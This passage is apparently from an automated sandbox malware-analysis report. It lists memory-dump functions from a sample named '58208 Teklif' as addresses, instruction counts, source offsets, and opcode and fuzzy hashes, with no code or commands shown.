                                                      • Instruction ID: 87bb482f737e83e26a8d3892487eb00a8cd7d519fefd00cafc00bdbbc5b84dc2
                                                      • Opcode Fuzzy Hash: 0cb6659c6c4217f931a5c36bd00f1b902b7cdf51ffa53eddfeb795657664001f
                                                      • Instruction Fuzzy Hash: 7941BF3190131ADFD704AF71E45D7EEBBB1EB4A306F005869E2026B2D4CB780A49CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01413960 Relevance: .1, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 363df41ea917d36b032a5a3bdfc3b7027c1b2e8086e5e19844fa199401325ffb
                                                      • Instruction ID: 900e2db8501a69d7317e917cbbe7cd8e65a420f4a00fa5c4790bd2fb9bb26179
                                                      • Opcode Fuzzy Hash: 363df41ea917d36b032a5a3bdfc3b7027c1b2e8086e5e19844fa199401325ffb
                                                      • Instruction Fuzzy Hash: 16519674E01319DFCB48DFAAD49099DBBB6FF89310B208569E905AB364DB31AD42CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01419AC3 Relevance: .1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6fda8ede2cd51e129c9f1e68b9086e3a79aef86ddbfbbe324a1d70adead097c
                                                      • Instruction ID: 47def19c53eff88d57b88c90d65d586f18009f9d5b5c84ed38d538976f883d76
                                                      • Opcode Fuzzy Hash: d6fda8ede2cd51e129c9f1e68b9086e3a79aef86ddbfbbe324a1d70adead097c
                                                      • Instruction Fuzzy Hash: 4E41D231A04249DFCF15CFA9C854A9EBFB2FF89318F048156E9519B369E330E950CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD9952 Relevance: .1, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 739712a071ec98f936ed76e009e39f24c79d0753cb2122485b1a3a6a3f62797c
                                                      • Instruction ID: 686661608cb27a48055d1f5450f9497c967a6b385ec7cdf632d92e9dcf164385
                                                      • Opcode Fuzzy Hash: 739712a071ec98f936ed76e009e39f24c79d0753cb2122485b1a3a6a3f62797c
                                                      • Instruction Fuzzy Hash: 86417071E0020A9BDB54DFA5C881ADEFBF5FF88700F248169E405BB240EB70A946CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01416790 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6103fa922862af8175e305775a57b8912c5b81b0db8d584d15d90cf84d85cf29
                                                      • Instruction ID: 2084fb570b50187781698975f569598fff7e5e973f4e0d3be6179ed636835fd4
                                                      • Opcode Fuzzy Hash: 6103fa922862af8175e305775a57b8912c5b81b0db8d584d15d90cf84d85cf29
                                                      • Instruction Fuzzy Hash: 9841C371A00208DFCB119F69C844BABBBF6FB44304F05846EE8559B365D7B4EC45CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD9EA8 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 970159b6d7349dc99c00ad4630092ed1b6f4789fab3aed0af9fb5d4ceb4f7388
                                                      • Instruction ID: 71e259a951906aaa401a5341aef3101fa18191f08bab45ab94e04998d56c5b5d
                                                      • Opcode Fuzzy Hash: 970159b6d7349dc99c00ad4630092ed1b6f4789fab3aed0af9fb5d4ceb4f7388
                                                      • Instruction Fuzzy Hash: 2441D0B8E01208DFDB44DFA9D5946EDBBF1BF48300F10952AE415AB298E7746946CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD9EAD Relevance: .1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b759ff89eccc52860f5559076759e4961b29232a5f134c1620ffe24f0d17f44
                                                      • Instruction ID: d8ffc8b6393cc23ea12c1b13fa2bfab521e20c676de6e7ddfe4196443336dd8f
                                                      • Opcode Fuzzy Hash: 4b759ff89eccc52860f5559076759e4961b29232a5f134c1620ffe24f0d17f44
                                                      • Instruction Fuzzy Hash: 5A41EEB8E01208CFDB44DFA9D5946EDBBF1FB48300F10952AE415AB298E7346A46CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01414E20 Relevance: .1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68a5ca2fba0be6a8e3f6631370a680f78fbed602a2789deef7bb0c96a297fc0b
                                                      • Instruction ID: 099fc79cdc95260ac796b275b6e674a362a6266822028055c492808742514f95
                                                      • Opcode Fuzzy Hash: 68a5ca2fba0be6a8e3f6631370a680f78fbed602a2789deef7bb0c96a297fc0b
                                                      • Instruction Fuzzy Hash: F331607174420AAFCB069F69D458AAF7FA6FB88310F048429F9058F355CB35ED61CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141A6C5 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d0a5a7140adb658e533216f5d31d1bd87f0e00de691f84c4cc9c58d4836f9330
                                                      • Instruction ID: 4f7935dff2c19be822b629d63785cdfdd9e9bebdf7d0041e69261c6b221ab2db
                                                      • Opcode Fuzzy Hash: d0a5a7140adb658e533216f5d31d1bd87f0e00de691f84c4cc9c58d4836f9330
                                                      • Instruction Fuzzy Hash: 5A31C135B402448FCB059F79D9586AE7BF2BF8C310F24486AE502EB3A1DE31AD01CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDE100 Relevance: .1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f37b988dd52199557a45746f9094c402e7cce2dba781890f00ccd61cb2e73536
                                                      • Instruction ID: 7c96fcc0ae89cb3df398440cc15d80449c87a9eeb3e8888341fd28bfcc4b67a7
                                                      • Opcode Fuzzy Hash: f37b988dd52199557a45746f9094c402e7cce2dba781890f00ccd61cb2e73536
                                                      • Instruction Fuzzy Hash: 8231AB7190520ADFD704EF71E46D3EEBBB1EB4A306F009869D1466A284CB780649CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01417740 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 78abed0ae4ed14adeab2795dc087cc64b299d4bd31a67d5dd2242e2687075cbc
                                                      • Instruction ID: 12d999950d5811146280153f32b5ca3fba4116123941ad8c65f55ab1b65c6d7c
                                                      • Opcode Fuzzy Hash: 78abed0ae4ed14adeab2795dc087cc64b299d4bd31a67d5dd2242e2687075cbc
                                                      • Instruction Fuzzy Hash: BB21B3347402014BEB16262EC894A7F369B9FC865AF14843ADD06CB3A9EE35DC83D3D1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141A869 Relevance: .1, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dfca7ca7577f23ca268fd784ddb844060bdc787f964c660eeef119e5f375fa8f
                                                      • Instruction ID: 595aabbe0c30e04b9eb0916f5d2c9bd66062dff8836684e587a22ecd1f829b27
                                                      • Opcode Fuzzy Hash: dfca7ca7577f23ca268fd784ddb844060bdc787f964c660eeef119e5f375fa8f
                                                      • Instruction Fuzzy Hash: EC31B374E405058FCB04CF69C8889AEBBF7BF85720B258559E5599B3B5CB30EC82CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 014120B8 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4853fd2d71b5c8bc1f283beb03c9781e17dd92be739c76b7a0577616ef751035
                                                      • Instruction ID: bf3e4162f68a663d8a844e6089890ddf1682c1a62f160690860f03a163b32b55
                                                      • Opcode Fuzzy Hash: 4853fd2d71b5c8bc1f283beb03c9781e17dd92be739c76b7a0577616ef751035
                                                      • Instruction Fuzzy Hash: 8F21F135A00116AFCB14DF38C4509AF37B5EF88664B60C51AE94DCB354EB30EA06CBD2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 010ED404 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3765510797.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10ed000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13668cc38d50dd0afc3205f06124c3bb8f1d3ec1719efa69ac8e10f8b57df716
                                                      • Instruction ID: 34964c298fc86010546a30dd81f1c7105f69e057caed195726d7ea5cacbc8792
                                                      • Opcode Fuzzy Hash: 13668cc38d50dd0afc3205f06124c3bb8f1d3ec1719efa69ac8e10f8b57df716
                                                      • Instruction Fuzzy Hash: 732145B1500204DFDB05DF99D9C8F6ABFE5FBA8314F20C1A9E9490B256C736E406C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01415AC8 Relevance: .1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8478a8dacec4d7f5cb8b6a9dd9e81ee3cf4ed48eb6cf467588a6128764f8d000
                                                      • Instruction ID: bcd4a846feaffbcd4bfd25b7d50a868402745f10380e70650bf9993d314e8001
                                                      • Opcode Fuzzy Hash: 8478a8dacec4d7f5cb8b6a9dd9e81ee3cf4ed48eb6cf467588a6128764f8d000
                                                      • Instruction Fuzzy Hash: D421D8357406128FD7259A2AD49856FB7A2FFC9650705857AE906CF368CF30EC02CBD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 010FD044 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3765579480.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10fd000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e337526afce01dc32bbc71f29f6dc9802350b235c0c048af53447f09af20ae6d
                                                      • Instruction ID: 1bcd282b2559fbfb4cbe542dacf9e5e8111c76aa2378279fd887c5ce6d238e4d
                                                      • Opcode Fuzzy Hash: e337526afce01dc32bbc71f29f6dc9802350b235c0c048af53447f09af20ae6d
                                                      • Instruction Fuzzy Hash: D6213471504204EFCB11CFA8C9C1B26BBA5FB84314F20C5ADFA894B756C73AD446CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01414E11 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eba01626975ec89764026678b72c514cd03d0efd790e8fbaa212ca94e5ff5401
                                                      • Instruction ID: 974428ed2d6547bb947a7eb56bdceb9b2c7850aa6a5ca3ca47843ad21c06e509
                                                      • Opcode Fuzzy Hash: eba01626975ec89764026678b72c514cd03d0efd790e8fbaa212ca94e5ff5401
                                                      • Instruction Fuzzy Hash: 8021C0716482099FDB16AF69D4187AB3BA6FB89320F048469F9458F358CB34ED51C7E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD9B40 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a59a1f0f16008f39ac022cee5ffd61cb77989bfe31f4010d617b29ddfcadaa74
                                                      • Instruction ID: 7c69d12834a03363d27d6a51a546601781be1184387f890478707a691bfde5f7
                                                      • Opcode Fuzzy Hash: a59a1f0f16008f39ac022cee5ffd61cb77989bfe31f4010d617b29ddfcadaa74
                                                      • Instruction Fuzzy Hash: 051104367082985FCF4AAF785C64ABE7FA3EFC5210B10446AE515DB391DF344D0683A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141E2D1 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e199a724338370d28c52a9fedcef3c74bb20b26dfdc6c83c7de65fdd26170454
                                                      • Instruction ID: 2d970bcb56aa215285b33ada83ef95b5a139bed5d441954062085423ddc0fa75
                                                      • Opcode Fuzzy Hash: e199a724338370d28c52a9fedcef3c74bb20b26dfdc6c83c7de65fdd26170454
                                                      • Instruction Fuzzy Hash: 1C213B74D0020A9FDB45EFBAD54579EBFF2FB44300F0086A9E4549B328EB745A49CB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDE510 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90139272d1b27c7041eee4da6695e5573d1173f322d0ea96c19924add899fda7
                                                      • Instruction ID: 3bb32d64ee8833eedab203ebfe4dc9de0a423d63d2a6dc26f3d11d4e8163c42b
                                                      • Opcode Fuzzy Hash: 90139272d1b27c7041eee4da6695e5573d1173f322d0ea96c19924add899fda7
                                                      • Instruction Fuzzy Hash: 88012B35B442549FD705467A585867BBFDBAFC9350F4488BBE506CB2C6ED24CC0683B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 010ED3FF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3765510797.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10ed000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                      • Instruction ID: 22cbc04601d1ddc37b301cf0112d96ffc84c0e57d80cfef43f085e628d3e9f44
                                                      • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                      • Instruction Fuzzy Hash: D611E1B2404280CFDB12CF44D5C8B56BFB2FB94324F24C1A9D9490B657C33AE45ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01411FB8 Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c3d57bf60dbb0bfc72d151d728c4aaed03cd620575991d4fee1dec8a921a1bb
                                                      • Instruction ID: a8949ea8b5a0f59037543aaece5a82327a469cf6c1903f3e8b4eb54bf417a375
                                                      • Opcode Fuzzy Hash: 3c3d57bf60dbb0bfc72d151d728c4aaed03cd620575991d4fee1dec8a921a1bb
                                                      • Instruction Fuzzy Hash: F821D3B4D452098FCB40EFA9D8555EEBFF1FF19300F10566AD905B2214EB301A95CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD9710 Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ceb08c327aa81ac7b35fd24ef4080dad3a7f272aaf183d4b8b04808209e9f04b
                                                      • Instruction ID: 92109bf3b8ed4056ac65149f87efcc0f273d997b232fab1b5adde62508ee30d7
                                                      • Opcode Fuzzy Hash: ceb08c327aa81ac7b35fd24ef4080dad3a7f272aaf183d4b8b04808209e9f04b
                                                      • Instruction Fuzzy Hash: 831164B280424DDFCB20DF9AC945BEEBFF4EB48320F148459E918A7210D379A954DFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141E2E0 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd2fdef080444422b69343277654d536a55319fbe3950bf1077a391e99f8969f
                                                      • Instruction ID: 6033c2d90410e235be706909192a41f553af4c48452ea1bae0422298519345d1
                                                      • Opcode Fuzzy Hash: fd2fdef080444422b69343277654d536a55319fbe3950bf1077a391e99f8969f
                                                      • Instruction Fuzzy Hash: C5113A74D0020A9FDB44EFBAD54569EBFF2FB44300F00C6A9E054AF328EB705A498B81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD9311 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3cb36608d06701341d242acf46e59f2f985dbaa8d700c8b313d2ed5bad263c30
                                                      • Instruction ID: 54ddf0e8ca557259abfc574564905b882792b2631e5724a601b421d742efeaae
                                                      • Opcode Fuzzy Hash: 3cb36608d06701341d242acf46e59f2f985dbaa8d700c8b313d2ed5bad263c30
                                                      • Instruction Fuzzy Hash: 90112A74E001498FEB54DBE9D860BAEBBB1AB48325F40D1A5E84CAB345E63099428B60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 010FD03F Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3765579480.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10fd000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                      • Instruction ID: 6b7c4b74fc02b85ec0b3ad15817c6afe398ac087591e0d58d3b65dad61ee5b59
                                                      • Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                      • Instruction Fuzzy Hash: 6F11DD75504284DFDB12CF54C9C4B15BFA2FB84314F24C6ADEA894B652C33AD44ACF62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141565F Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 178d5a0f7ba04cc5549a3814bc6319e8caf670b7dbd04282ebb774f975ce506d
                                                      • Instruction ID: 05189a2def45555d6f2a0f004657088356967612b509ffc04ee1c2fd55b3c0ab
                                                      • Opcode Fuzzy Hash: 178d5a0f7ba04cc5549a3814bc6319e8caf670b7dbd04282ebb774f975ce506d
                                                      • Instruction Fuzzy Hash: 8201C032A402156BDB019E6AA8206EF3FA6DBCA650B14843AF508CB354CA319852CBD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD9DE9 Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f03a3e8c22eae56891e4447e412a0085755de4307120b22d52f941a3037c53e
                                                      • Instruction ID: 035b22329b3311f7369313005eefa4dd2f3841a219d45d475cc40c4e4f28db12
                                                      • Opcode Fuzzy Hash: 0f03a3e8c22eae56891e4447e412a0085755de4307120b22d52f941a3037c53e
                                                      • Instruction Fuzzy Hash: E81153B680020ADFCB10DF99C905BDEBBF4EF08320F148419E528A7210D339A654CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD2AD5 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 257d76c5fd6a9a39fe1dc2b51efdd62a74ba0043807be78ff3bb3521094bd2bb
                                                      • Instruction ID: 1e9169efcba4424d6554b8fbb7a34592d6575e121fdb4bdd729ef88a69a9495e
                                                      • Opcode Fuzzy Hash: 257d76c5fd6a9a39fe1dc2b51efdd62a74ba0043807be78ff3bb3521094bd2bb
                                                      • Instruction Fuzzy Hash: 27014BB5F402158FCB90EF7CE5045597BF0EF48211B1105A9EA0ADF715EB31DD018B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD2A38 Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 773335c0311cdf16379f54c3cd27f2a15a518813c57569a19ec35d5fa43bbd92
                                                      • Instruction ID: 61682ab9e6173a90dcb508f9d22e0040fb5030e17a97de4e6f22401b10df6a87
                                                      • Opcode Fuzzy Hash: 773335c0311cdf16379f54c3cd27f2a15a518813c57569a19ec35d5fa43bbd92
                                                      • Instruction Fuzzy Hash: 2A01D670E4021A9FCF54EFBAC8406AEBBB5BF48200F00856AD519EB254E7345902CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD2A33 Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aa239a77b331ddf430cc52f4646023f360902226f79d8b7dafd13c94ae795c71
                                                      • Instruction ID: c19a9aaab0a3850b154e839116237daa580f54e5e253f8ce6ca55228cdcbb753
